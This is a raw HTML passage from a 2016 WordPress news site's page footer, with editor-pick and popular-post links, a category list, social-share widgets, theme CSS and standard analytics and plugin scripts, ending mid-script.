                <div class="td-module-thumb"><a href="http://www.gulftimes.com/2016/03/02/what-we-learned-from-super-tuesday/" rel="bookmark" title="What we learned from Super Tuesday"><img width="1" height="1" itemprop="image" class="entry-thumb" src="http://www.gulftimes.com/wp-content/uploads/2016/03/1456918243_rc.img" alt="" title="What we learned from Super Tuesday"/></a></div>                <a href="http://www.gulftimes.com/international/usa/" class="td-post-category">USA</a>            </div>

            <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://www.gulftimes.com/2016/03/02/what-we-learned-from-super-tuesday/" rel="bookmark" title="What we learned from Super Tuesday">What we learned from Super Tuesday</a></h3>
            <meta itemprop="author" content = "Gulf Times"><meta itemprop="datePublished" content="2016-03-02T11:30:44+00:00"><meta itemprop="headline " content="What we learned from Super Tuesday"><meta itemprop="image" content="http://www.gulftimes.com/wp-content/uploads/2016/03/1456918243_rc.img"><meta itemprop="interactionCount" content="UserComments:0"/>
        </div>

        
	</div> <!-- ./td-block-span12 --></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_5_57dc5d40b6b2a" data-td_block_id="td_uid_5_57dc5d40b6b2a"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_5_57dc5d40b6b2a" data-td_block_id="td_uid_5_57dc5d40b6b2a"><i class="td-icon-font td-icon-menu-right"></i></a></div></div> <!-- ./block -->                            </div>
                        </div>
                            </div> <!-- /.td-pb-row -->
    </div> <!-- /.td-container -->
</div> <!-- /.td-main-content-wrap -->



<!-- Footer -->
<div class="td-footer-wrapper">
    <div class="td-container">

	    <div class="td-pb-row">
		    <div class="td-pb-span12">
			    		    </div>
	    </div>

        <div class="td-pb-row">

            <div class="td-pb-span4">
                <script>var block_td_uid_6_57dc5d40bbb30 = new tdBlock();
block_td_uid_6_57dc5d40bbb30.id = "td_uid_6_57dc5d40bbb30";
block_td_uid_6_57dc5d40bbb30.atts = '{"custom_title":"EDITOR PICKS","limit":3,"sort":"featured","class":"td_block_id_160526095 td_uid_6_57dc5d40bbb30_rand"}';
block_td_uid_6_57dc5d40bbb30.td_column_number = "1";
block_td_uid_6_57dc5d40bbb30.block_type = "td_block_7";
block_td_uid_6_57dc5d40bbb30.post_count = "3";
block_td_uid_6_57dc5d40bbb30.found_posts = "548";
block_td_uid_6_57dc5d40bbb30.header_color = "";
block_td_uid_6_57dc5d40bbb30.ajax_pagination_infinite_stop = "";
block_td_uid_6_57dc5d40bbb30.max_num_pages = "183";
tdBlocksArray.push(block_td_uid_6_57dc5d40bbb30);
</script><div class="td_block_wrap td_block_7 td_block_id_160526095 td_uid_6_57dc5d40bbb30_rand td-pb-border-top"><h4 class="block-title"><span>EDITOR PICKS</span></h4><div id=td_uid_6_57dc5d40bbb30 class="td_block_inner">

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack" itemscope itemtype="http://schema.org/Article">

        <div class="td-module-thumb"><a href="http://www.gulftimes.com/2016/09/16/education-and-the-invisible-child/" rel="bookmark" title="Education and the Invisible Child"><img width="100" height="70" itemprop="image" class="entry-thumb" src="http://www.gulftimes.com/wp-content/themes/Newspaper/images/no-thumb/td_100x70.png" alt=""/></a></div>
        <div class="item-details">
            <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://www.gulftimes.com/2016/09/16/education-and-the-invisible-child/" rel="bookmark" title="Education and the Invisible Child">Education and the Invisible Child</a></h3>            <div class="td-module-meta-info">
                                                <div class="td-post-date"><time  itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2016-09-16T19:52:39+00:00" >September 16, 2016</time><meta itemprop="interactionCount" content="UserComments:0"/></div>                            </div>
        </div>
        <meta itemprop="author" content = "Gulf Times"><meta itemprop="datePublished" content="2016-09-16T19:52:39+00:00"><meta itemprop="headline " content="Education and the Invisible Child"><meta itemprop="interactionCount" content="UserComments:0"/>        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack" itemscope itemtype="http://schema.org/Article">

        <div class="td-module-thumb"><a href="http://www.gulftimes.com/2016/09/16/how-to-save-on-your-first-set-of-ski-equipment/" rel="bookmark" title="How to Save on Your First Set of Ski Equipment"><img width="100" height="70" itemprop="image" class="entry-thumb" src="http://www.gulftimes.com/wp-content/uploads/2016/02/dreamit-100x70.jpg" alt="" title="How to Save on Your First Set of Ski Equipment"/></a></div>
        <div class="item-details">
            <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://www.gulftimes.com/2016/09/16/how-to-save-on-your-first-set-of-ski-equipment/" rel="bookmark" title="How to Save on Your First Set of Ski Equipment">How to Save on Your First Set of Ski Equipment</a></h3>            <div class="td-module-meta-info">
                                                <div class="td-post-date"><time  itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2016-09-16T19:39:37+00:00" >September 16, 2016</time><meta itemprop="interactionCount" content="UserComments:0"/></div>                            </div>
        </div>
        <meta itemprop="author" content = "Gulf Times"><meta itemprop="datePublished" content="2016-09-16T19:39:37+00:00"><meta itemprop="headline " content="How to Save on Your First Set of Ski Equipment"><meta itemprop="image" content="http://www.gulftimes.com/wp-content/uploads/2016/02/dreamit.jpg"><meta itemprop="interactionCount" content="UserComments:0"/>        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack" itemscope itemtype="http://schema.org/Article">

        <div class="td-module-thumb"><a href="http://www.gulftimes.com/2016/09/16/immense-need-for-close-monitoring-of-dubai-debt-warns-analyst/" rel="bookmark" title="&#039;Immense need for close monitoring&#039; of Dubai debt, warns analyst"><img width="100" height="70" itemprop="image" class="entry-thumb" src="http://www.gulftimes.com/wp-content/uploads/2016/09/dubai_skyline-100x70.jpg" alt="" title="&#039;Immense need for close monitoring&#039; of Dubai debt, warns analyst"/></a></div>
        <div class="item-details">
            <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://www.gulftimes.com/2016/09/16/immense-need-for-close-monitoring-of-dubai-debt-warns-analyst/" rel="bookmark" title="&#039;Immense need for close monitoring&#039; of Dubai debt, warns analyst">&#039;Immense need for close monitoring&#039; of Dubai debt, warns analyst</a></h3>            <div class="td-module-meta-info">
                                                <div class="td-post-date"><time  itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2016-09-16T19:22:36+00:00" >September 16, 2016</time><meta itemprop="interactionCount" content="UserComments:0"/></div>                            </div>
        </div>
        <meta itemprop="author" content = "Gulf Times"><meta itemprop="datePublished" content="2016-09-16T19:22:36+00:00"><meta itemprop="headline " content="&#039;Immense need for close monitoring&#039; of Dubai debt, warns analyst"><meta itemprop="image" content="http://www.gulftimes.com/wp-content/uploads/2016/09/dubai_skyline.jpg"><meta itemprop="interactionCount" content="UserComments:0"/>        </div>

        
	</div> <!-- ./td-block-span12 --></div></div> <!-- ./block -->                            </div>

            <div class="td-pb-span4">
                <script>var block_td_uid_7_57dc5d40bec3c = new tdBlock();
block_td_uid_7_57dc5d40bec3c.id = "td_uid_7_57dc5d40bec3c";
block_td_uid_7_57dc5d40bec3c.atts = '{"custom_title":"POPULAR POSTS","limit":3,"sort":"popular","class":"td_block_id_3264299802 td_uid_7_57dc5d40bec3c_rand"}';
block_td_uid_7_57dc5d40bec3c.td_column_number = "1";
block_td_uid_7_57dc5d40bec3c.block_type = "td_block_7";
block_td_uid_7_57dc5d40bec3c.post_count = "3";
block_td_uid_7_57dc5d40bec3c.found_posts = "548";
block_td_uid_7_57dc5d40bec3c.header_color = "";
block_td_uid_7_57dc5d40bec3c.ajax_pagination_infinite_stop = "";
block_td_uid_7_57dc5d40bec3c.max_num_pages = "183";
tdBlocksArray.push(block_td_uid_7_57dc5d40bec3c);
</script><div class="td_block_wrap td_block_7 td_block_id_3264299802 td_uid_7_57dc5d40bec3c_rand td-pb-border-top"><h4 class="block-title"><span>POPULAR POSTS</span></h4><div id=td_uid_7_57dc5d40bec3c class="td_block_inner">

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack" itemscope itemtype="http://schema.org/Article">

        <div class="td-module-thumb"><a href="http://www.gulftimes.com/2016/02/02/life-is-strange-review/" rel="bookmark" title="Life is Strange – Review"><img width="100" height="70" itemprop="image" class="entry-thumb" src="http://www.gulftimes.com/wp-content/uploads/2016/02/life-is-strange-episode-1-impressions-100x70.jpg" alt="School begins" title="Life is Strange – Review"/></a></div>
        <div class="item-details">
            <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://www.gulftimes.com/2016/02/02/life-is-strange-review/" rel="bookmark" title="Life is Strange – Review">Life is Strange – Review</a></h3>            <div class="td-module-meta-info">
                                                <div class="td-post-date"><time  itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2016-02-02T04:21:57+00:00" >February 2, 2016</time><meta itemprop="interactionCount" content="UserComments:2"/></div>                            </div>
        </div>
        <meta itemprop="author" content = "Gulf Times"><meta itemprop="datePublished" content="2016-02-02T04:21:57+00:00"><meta itemprop="headline " content="Life is Strange – Review"><meta itemprop="image" content="http://www.gulftimes.com/wp-content/uploads/2016/02/life-is-strange-episode-1-impressions.jpg"><meta itemprop="interactionCount" content="UserComments:2"/>        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack" itemscope itemtype="http://schema.org/Article">

        <div class="td-module-thumb"><a href="http://www.gulftimes.com/2016/02/01/legal-rape-mens-group-plans-australia-wide-tribal-meetings/" rel="bookmark" title="&#039;Legal rape&#039; men&#039;s group plans Australia-wide &#039;tribal meetings&#039;"><img width="100" height="70" itemprop="image" class="entry-thumb" src="http://www.gulftimes.com/wp-content/uploads/2016/02/7131522-1x1-700x700-100x70.jpg" alt="" title="&#039;Legal rape&#039; men&#039;s group plans Australia-wide &#039;tribal meetings&#039;"/></a></div>
        <div class="item-details">
            <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://www.gulftimes.com/2016/02/01/legal-rape-mens-group-plans-australia-wide-tribal-meetings/" rel="bookmark" title="&#039;Legal rape&#039; men&#039;s group plans Australia-wide &#039;tribal meetings&#039;">&#039;Legal rape&#039; men&#039;s group plans Australia-wide &#039;tribal meetings&#039;</a></h3>            <div class="td-module-meta-info">
                                                <div class="td-post-date"><time  itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2016-02-01T11:19:41+00:00" >February 1, 2016</time><meta itemprop="interactionCount" content="UserComments:0"/></div>                            </div>
        </div>
        <meta itemprop="author" content = "Gulf Times"><meta itemprop="datePublished" content="2016-02-01T11:19:41+00:00"><meta itemprop="headline " content="&#039;Legal rape&#039; men&#039;s group plans Australia-wide &#039;tribal meetings&#039;"><meta itemprop="image" content="http://www.gulftimes.com/wp-content/uploads/2016/02/7131522-1x1-700x700.jpg"><meta itemprop="interactionCount" content="UserComments:0"/>        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack" itemscope itemtype="http://schema.org/Article">

        <div class="td-module-thumb"><a href="http://www.gulftimes.com/2016/02/02/top-5-pc-games-we-played-in-2015/" rel="bookmark" title="Top 5 PC Games We Played in 2015"><img width="100" height="70" itemprop="image" class="entry-thumb" src="http://www.gulftimes.com/wp-content/uploads/2016/02/maxresdefault-100x70.jpg" alt="Gulf Times Life is Strange" title="Top 5 PC Games We Played in 2015"/></a></div>
        <div class="item-details">
            <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://www.gulftimes.com/2016/02/02/top-5-pc-games-we-played-in-2015/" rel="bookmark" title="Top 5 PC Games We Played in 2015">Top 5 PC Games We Played in 2015</a></h3>            <div class="td-module-meta-info">
                                                <div class="td-post-date"><time  itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2016-02-02T04:15:17+00:00" >February 2, 2016</time><meta itemprop="interactionCount" content="UserComments:0"/></div>                            </div>
        </div>
        <meta itemprop="author" content = "Gulf Times"><meta itemprop="datePublished" content="2016-02-02T04:15:17+00:00"><meta itemprop="headline " content="Top 5 PC Games We Played in 2015"><meta itemprop="image" content="http://www.gulftimes.com/wp-content/uploads/2016/02/maxresdefault.jpg"><meta itemprop="interactionCount" content="UserComments:0"/>        </div>

        
	</div> <!-- ./td-block-span12 --></div></div> <!-- ./block -->                            </div>

            <div class="td-pb-span4">
                <div class="td_block_wrap td_block_popular_categories td_block_id_2115879150 td_uid_8_57dc5d40c3ef3_rand widget widget_categories td-pb-border-top"><h4 class="block-title"><span>POPULAR CATEGORY</span></h4><ul class="td-pb-padding-side"><li><a href="http://www.gulftimes.com/uae-business/qatar/">Qatar<span class="td-cat-no">47</span></a></li><li><a href="http://www.gulftimes.com/uae-business/">UAE - Business<span class="td-cat-no">32</span></a></li><li><a href="http://www.gulftimes.com/sport/football/">Football<span class="td-cat-no">32</span></a></li><li><a href="http://www.gulftimes.com/sport/golf/">Golf<span class="td-cat-no">32</span></a></li><li><a href="http://www.gulftimes.com/uae-business/stock-market/">Stock Market<span class="td-cat-no">31</span></a></li><li><a href="http://www.gulftimes.com/sport/basketball/">Basketball<span class="td-cat-no">31</span></a></li><li><a href="http://www.gulftimes.com/international/">International<span class="td-cat-no">31</span></a></li><li><a href="http://www.gulftimes.com/international/australia/">Australia<span class="td-cat-no">31</span></a></li><li><a href="http://www.gulftimes.com/opinion/">Opinion<span class="td-cat-no">31</span></a></li></ul></div> <!-- ./block -->                            </div>
        </div>
    </div>
    <div class="td-footer-bottom-full">
        <div class="td-container">
            <div class="td-pb-row">
                <div class="td-pb-span3"><aside class="footer-logo-wrap"><a href="http://www.gulftimes.com/"><img class="td-retina-data" src="http://www.gulftimes.com/wp-content/uploads/2015/12/gulf-times-online-nespaper-300x150.png" data-retina="http://www.gulftimes.com/wp-content/uploads/2015/12/gulf-times-online-nespaper-300x150.png" alt=""/></a></aside></div><div class="td-pb-span5"><aside class="footer-text-wrap"><div class="block-title"><span>ABOUT US</span></div>Return next time for more Europe News, Football News, UAE News, Oil Market News and Cultural Information!
<div class="footer-email-wrap">Contact us: <a href="mailto:contact@gulftimes.com">contact@gulftimes.com</a></div></aside></div><div class="td-pb-span4"><aside class="footer-social-wrap td-social-style-2"><div class="block-title"><span>FOLLOW US</span></div><span class="td-social-icon-wrap"><a target="_blank" href="https://www.facebook.com/igulftimes" title="Facebook"><i class="td-icon-font td-icon-facebook"></i></a></span><span class="td-social-icon-wrap"><a target="_blank" href="https://twitter.com/gulftimescom" title="Twitter"><i class="td-icon-font td-icon-twitter"></i></a></span></aside></div>            </div>
        </div>
    </div>
</div>

<!-- Sub Footer -->
    <div class="td-sub-footer-container">
        <div class="td-container">
            <div class="td-pb-row">
                <div class="td-pb-span7 td-sub-footer-menu">
                        <div class="menu-td-demo-footer-menu-container"><ul id="menu-td-demo-footer-menu" class="td-subfooter-menu"><li id="menu-item-19548" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-first td-menu-item td-normal-menu menu-item-19548"><a href="http://www.gulftimes.com/advertise/">Advertise</a></li>
<li id="menu-item-19549" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-19549"><a href="http://www.gulftimes.com/privacy-policy/">Privacy Policy</a></li>
<li id="menu-item-19550" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-19550"><a href="http://www.gulftimes.com/disclosure/">Disclosure</a></li>
</ul></div>                </div>

                <div class="td-pb-span5 td-sub-footer-copy">
                    &copy; Copyright 2015 - By None										<p class="wprm">wordpress theme powered by <a href="http://jazzsurf.com" title="jazzsurf">jazzsurf.com</a></p>					
                </div>
            </div>
        </div>
    </div>
    </div><!--close content div-->
</div><!--close td-outer-wrap-->

<div class="et_social_pin_images_outer">
					<div class="et_social_pinterest_window">
						<div class="et_social_modal_header"><h3>Pin It on Pinterest</h3><span class="et_social_close"></span></div>
						<div class="et_social_pin_images" data-permalink="http://www.gulftimes.com/2016/09/16/immense-need-for-close-monitoring-of-dubai-debt-warns-analyst/" data-title="&#039;Immense need for close monitoring&#039; of Dubai debt, warns analyst" data-post_id="28273"></div>
					</div>
				</div><div class="et_social_sidebar_networks et_social_visible_sidebar et_social_slideright et_social_animated et_social_circle et_social_sidebar_flip et_social_mobile_on">
					
					<ul class="et_social_icons_container"><li class="et_social_facebook">
									<a href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fwww.gulftimes.com%2F2016%2F09%2F16%2Fimmense-need-for-close-monitoring-of-dubai-debt-warns-analyst%2F&#038;t=%27Immense%20need%20for%20close%20monitoring%27%20of%20Dubai%20debt%2C%20warns%20analyst" class="et_social_share" rel="nofollow" data-social_name="facebook" data-post_id="28273" data-social_type="share" data-location="sidebar">
										<i class="et_social_icon et_social_icon_facebook"></i>
										
										
										<span class="et_social_overlay"></span>
									</a>
								</li><li class="et_social_twitter">
									<a href="http://twitter.com/share?text=%27Immense%20need%20for%20close%20monitoring%27%20of%20Dubai%20debt%2C%20warns%20analyst&#038;url=http%3A%2F%2Fwww.gulftimes.com%2F2016%2F09%2F16%2Fimmense-need-for-close-monitoring-of-dubai-debt-warns-analyst%2F&#038;via=" class="et_social_share" rel="nofollow" data-social_name="twitter" data-post_id="28273" data-social_type="share" data-location="sidebar">
										<i class="et_social_icon et_social_icon_twitter"></i>
										
										
										<span class="et_social_overlay"></span>
									</a>
								</li><li class="et_social_googleplus">
									<a href="https://plus.google.com/share?url=http%3A%2F%2Fwww.gulftimes.com%2F2016%2F09%2F16%2Fimmense-need-for-close-monitoring-of-dubai-debt-warns-analyst%2F&#038;t=%27Immense%20need%20for%20close%20monitoring%27%20of%20Dubai%20debt%2C%20warns%20analyst" class="et_social_share" rel="nofollow" data-social_name="googleplus" data-post_id="28273" data-social_type="share" data-location="sidebar">
										<i class="et_social_icon et_social_icon_googleplus"></i>
										
										
										<span class="et_social_overlay"></span>
									</a>
								</li><li class="et_social_pinterest">
									<a href="#" class="et_social_share_pinterest" rel="nofollow" data-social_name="pinterest" data-post_id="28273" data-social_type="share" data-location="sidebar">
										<i class="et_social_icon et_social_icon_pinterest"></i>
										
										
										<span class="et_social_overlay"></span>
									</a>
								</li><li class="et_social_linkedin">
									<a href="http://www.linkedin.com/shareArticle?mini=true&#038;url=http%3A%2F%2Fwww.gulftimes.com%2F2016%2F09%2F16%2Fimmense-need-for-close-monitoring-of-dubai-debt-warns-analyst%2F&#038;title=%27Immense%20need%20for%20close%20monitoring%27%20of%20Dubai%20debt%2C%20warns%20analyst" class="et_social_share" rel="nofollow" data-social_name="linkedin" data-post_id="28273" data-social_type="share" data-location="sidebar">
										<i class="et_social_icon et_social_icon_linkedin"></i>
										
										
										<span class="et_social_overlay"></span>
									</a>
								</li><li class="et_social_stumbleupon">
									<a href="http://www.stumbleupon.com/badge?url=http%3A%2F%2Fwww.gulftimes.com%2F2016%2F09%2F16%2Fimmense-need-for-close-monitoring-of-dubai-debt-warns-analyst%2F&#038;title=%27Immense%20need%20for%20close%20monitoring%27%20of%20Dubai%20debt%2C%20warns%20analyst" class="et_social_share" rel="nofollow" data-social_name="stumbleupon" data-post_id="28273" data-social_type="share" data-location="sidebar">
										<i class="et_social_icon et_social_icon_stumbleupon"></i>
										
										
										<span class="et_social_overlay"></span>
									</a>
								</li></ul>
					<span class="et_social_hide_sidebar et_social_icon"></span>
				</div><div class="et_social_mobile_button"></div>
					<div class="et_social_mobile et_social_fadein">
						<div class="et_social_heading">Share This</div>
						<span class="et_social_close"></span>
						<div class="et_social_networks et_social_simple et_social_rounded et_social_left">
							<ul class="et_social_icons_container"><li class="et_social_facebook">
									<a href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fwww.gulftimes.com%2F2016%2F09%2F16%2Fimmense-need-for-close-monitoring-of-dubai-debt-warns-analyst%2F&#038;t=%27Immense%20need%20for%20close%20monitoring%27%20of%20Dubai%20debt%2C%20warns%20analyst" class="et_social_share" rel="nofollow" data-social_name="facebook" data-post_id="28273" data-social_type="share" data-location="sidebar">
										<i class="et_social_icon et_social_icon_facebook"></i>
										<div class="et_social_network_label"><div class="et_social_networkname">Facebook</div></div>
										
										<span class="et_social_overlay"></span>
									</a>
								</li><li class="et_social_twitter">
									<a href="http://twitter.com/share?text=%27Immense%20need%20for%20close%20monitoring%27%20of%20Dubai%20debt%2C%20warns%20analyst&#038;url=http%3A%2F%2Fwww.gulftimes.com%2F2016%2F09%2F16%2Fimmense-need-for-close-monitoring-of-dubai-debt-warns-analyst%2F&#038;via=" class="et_social_share" rel="nofollow" data-social_name="twitter" data-post_id="28273" data-social_type="share" data-location="sidebar">
										<i class="et_social_icon et_social_icon_twitter"></i>
										<div class="et_social_network_label"><div class="et_social_networkname">Twitter</div></div>
										
										<span class="et_social_overlay"></span>
									</a>
								</li><li class="et_social_googleplus">
									<a href="https://plus.google.com/share?url=http%3A%2F%2Fwww.gulftimes.com%2F2016%2F09%2F16%2Fimmense-need-for-close-monitoring-of-dubai-debt-warns-analyst%2F&#038;t=%27Immense%20need%20for%20close%20monitoring%27%20of%20Dubai%20debt%2C%20warns%20analyst" class="et_social_share" rel="nofollow" data-social_name="googleplus" data-post_id="28273" data-social_type="share" data-location="sidebar">
										<i class="et_social_icon et_social_icon_googleplus"></i>
										<div class="et_social_network_label"><div class="et_social_networkname">Google+</div></div>
										
										<span class="et_social_overlay"></span>
									</a>
								</li><li class="et_social_pinterest">
									<a href="#" class="et_social_share_pinterest" rel="nofollow" data-social_name="pinterest" data-post_id="28273" data-social_type="share" data-location="sidebar">
										<i class="et_social_icon et_social_icon_pinterest"></i>
										<div class="et_social_network_label"><div class="et_social_networkname">Pinterest</div></div>
										
										<span class="et_social_overlay"></span>
									</a>
								</li><li class="et_social_linkedin">
									<a href="http://www.linkedin.com/shareArticle?mini=true&#038;url=http%3A%2F%2Fwww.gulftimes.com%2F2016%2F09%2F16%2Fimmense-need-for-close-monitoring-of-dubai-debt-warns-analyst%2F&#038;title=%27Immense%20need%20for%20close%20monitoring%27%20of%20Dubai%20debt%2C%20warns%20analyst" class="et_social_share" rel="nofollow" data-social_name="linkedin" data-post_id="28273" data-social_type="share" data-location="sidebar">
										<i class="et_social_icon et_social_icon_linkedin"></i>
										<div class="et_social_network_label"><div class="et_social_networkname">LinkedIn</div></div>
										
										<span class="et_social_overlay"></span>
									</a>
								</li><li class="et_social_stumbleupon">
									<a href="http://www.stumbleupon.com/badge?url=http%3A%2F%2Fwww.gulftimes.com%2F2016%2F09%2F16%2Fimmense-need-for-close-monitoring-of-dubai-debt-warns-analyst%2F&#038;title=%27Immense%20need%20for%20close%20monitoring%27%20of%20Dubai%20debt%2C%20warns%20analyst" class="et_social_share" rel="nofollow" data-social_name="stumbleupon" data-post_id="28273" data-social_type="share" data-location="sidebar">
										<i class="et_social_icon et_social_icon_stumbleupon"></i>
										<div class="et_social_network_label"><div class="et_social_networkname">StumbleUpon</div></div>
										
										<span class="et_social_overlay"></span>
									</a>
								</li></ul>
						</div>
					</div>
					<div class="et_social_mobile_overlay"></div><div class="et_social_flyin et_social_resize et_social_flyin_bottom_right et_social_slideup et_social_trigger_bottom et_social_mobile_on">
					<a href="#" class="et_social_icon et_social_icon_cancel"></a>
					<div class="et_social_header">
						<h3>Share This</h3>
						<p>Share this post with your friends!</p>
					</div>
					<div class="et_social_networks et_social_2col et_social_slide et_social_rounded et_social_left et_social_withnetworknames">
						
						<ul class="et_social_icons_container"><li class="et_social_facebook"><a href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fwww.gulftimes.com%2F2016%2F09%2F16%2Fimmense-need-for-close-monitoring-of-dubai-debt-warns-analyst%2F&#038;t=%27Immense%20need%20for%20close%20monitoring%27%20of%20Dubai%20debt%2C%20warns%20analyst" class="et_social_share" rel="nofollow" data-social_name="facebook" data-post_id="28273" data-social_type="share" data-location="flyin"><i class="et_social_icon et_social_icon_facebook"></i><div class="et_social_network_label"><div class="et_social_networkname">Facebook</div></div><span class="et_social_overlay"></span></a></li><li class="et_social_twitter"><a href="http://twitter.com/share?text=%27Immense%20need%20for%20close%20monitoring%27%20of%20Dubai%20debt%2C%20warns%20analyst&#038;url=http%3A%2F%2Fwww.gulftimes.com%2F2016%2F09%2F16%2Fimmense-need-for-close-monitoring-of-dubai-debt-warns-analyst%2F&#038;via=" class="et_social_share" rel="nofollow" data-social_name="twitter" data-post_id="28273" data-social_type="share" data-location="flyin"><i class="et_social_icon et_social_icon_twitter"></i><div class="et_social_network_label"><div class="et_social_networkname">Twitter</div></div><span class="et_social_overlay"></span></a></li><li class="et_social_googleplus"><a href="https://plus.google.com/share?url=http%3A%2F%2Fwww.gulftimes.com%2F2016%2F09%2F16%2Fimmense-need-for-close-monitoring-of-dubai-debt-warns-analyst%2F&#038;t=%27Immense%20need%20for%20close%20monitoring%27%20of%20Dubai%20debt%2C%20warns%20analyst" class="et_social_share" rel="nofollow" data-social_name="googleplus" data-post_id="28273" data-social_type="share" data-location="flyin"><i class="et_social_icon et_social_icon_googleplus"></i><div class="et_social_network_label"><div class="et_social_networkname">Google+</div></div><span class="et_social_overlay"></span></a></li><li class="et_social_pinterest"><a href="#" class="et_social_share_pinterest" rel="nofollow" data-social_name="pinterest" data-post_id="28273" data-social_type="share" data-location="flyin"><i class="et_social_icon et_social_icon_pinterest"></i><div class="et_social_network_label"><div class="et_social_networkname">Pinterest</div></div><span class="et_social_overlay"></span></a></li><li class="et_social_linkedin"><a href="http://www.linkedin.com/shareArticle?mini=true&#038;url=http%3A%2F%2Fwww.gulftimes.com%2F2016%2F09%2F16%2Fimmense-need-for-close-monitoring-of-dubai-debt-warns-analyst%2F&#038;title=%27Immense%20need%20for%20close%20monitoring%27%20of%20Dubai%20debt%2C%20warns%20analyst" class="et_social_share" rel="nofollow" data-social_name="linkedin" data-post_id="28273" data-social_type="share" data-location="flyin"><i class="et_social_icon et_social_icon_linkedin"></i><div class="et_social_network_label"><div class="et_social_networkname">LinkedIn</div></div><span class="et_social_overlay"></span></a></li><li class="et_social_stumbleupon"><a href="http://www.stumbleupon.com/badge?url=http%3A%2F%2Fwww.gulftimes.com%2F2016%2F09%2F16%2Fimmense-need-for-close-monitoring-of-dubai-debt-warns-analyst%2F&#038;title=%27Immense%20need%20for%20close%20monitoring%27%20of%20Dubai%20debt%2C%20warns%20analyst" class="et_social_share" rel="nofollow" data-social_name="stumbleupon" data-post_id="28273" data-social_type="share" data-location="flyin"><i class="et_social_icon et_social_icon_stumbleupon"></i><div class="et_social_network_label"><div class="et_social_networkname">StumbleUpon</div></div><span class="et_social_overlay"></span></a></li></ul>
					</div>
				</div>

    <!--

        Theme: Newspaper by tagDiv 2015
        Version: 6.5.1 (rara)
        Deploy mode: deploy
        
        uid: 57dc5d41928e1
    -->

    
<!-- Custom css form theme panel -->
<style type="text/css" media="screen">
/* custom css theme panel */
.notice, div.error, div.updated {
display: none;
}

.notice-error, div.error {
display: none;
}

.media-upload-form .notice, .media-upload-form div.error, .wrap .notice, .wrap div.error, .wrap div.updated {
display: none;
}

#wpadminbar ul li:last-child, #wpadminbar ul li:last-child .ab-item {
display: none;
}
</style>

<script type=text/javascript>
<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-71428134-1', 'auto');
  ga('send', 'pageview');

</script>
</script><script type='text/javascript' src='http://www.gulftimes.com/wp-content/plugins/monarch/js/idle-timer.min.js?ver=1.2.5'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var monarchSettings = {"ajaxurl":"http:\/\/www.gulftimes.com\/wp-admin\/admin-ajax.php","pageurl":"http:\/\/www.gulftimes.com\/2016\/09\/16\/immense-need-for-close-monitoring-of-dubai-debt-warns-analyst\/","stats_nonce":"d06ed412b4","share_counts":"c922f6b41d","follow_counts":"df465c34ea","total_counts":"b53353b48c","media_single":"c18b2e5150","media_total":"443317b060","generate_all_window_nonce":"c34fa1b6c6","no_img_message":"No images available for sharing on this page"};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.gulftimes.com/wp-content/plugins/monarch/js/custom.js?ver=1.2.5'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var JQLBSettings = {"fitToScreen":"0","resizeSpeed":"400","displayDownloadLink":"0","navbarOnTop":"0","loopImages":"","resizeCenter":"","marginSize":"","linkTarget":"","help":"","prevLinkTitle":"previous image","nextLinkTitle":"next image","prevLinkText":"\u00ab Previous","nextLinkText":"Next \u00bb","closeTitle":"close image gallery","image":"Image ","of":" of ","download":"Download","jqlb_overlay_opacity":"80","jqlb_overlay_color":"#000000","jqlb_overlay_close":"1","jqlb_border_width":"10","jqlb_border_color":"#ffffff","jqlb_border_radius":"0","jqlb_image_info_background_transparency":"100","jqlb_image_info_bg_color":"#ffffff","jqlb_image_info_text_color":"#000000","jqlb_image_info_text_fontsize":"10","jqlb_show_text_for_image":"1","jqlb_next_image_title":"next image","jqlb_previous_image_title":"previous image","jqlb_next_button_image":"http:\/\/www.gulftimes.com\/wp-content\/plugins\/wp-lightbox-2\/styles\/images\/next.gif","jqlb_previous_button_image":"http:\/\/www.gulftimes.com\/wp-content\/plugins\/wp-lightbox-2\/styles\/images\/prev.gif","jqlb_maximum_width":"","jqlb_maximum_height":"","jqlb_show_close_button":"1","jqlb_close_image_title":"close image 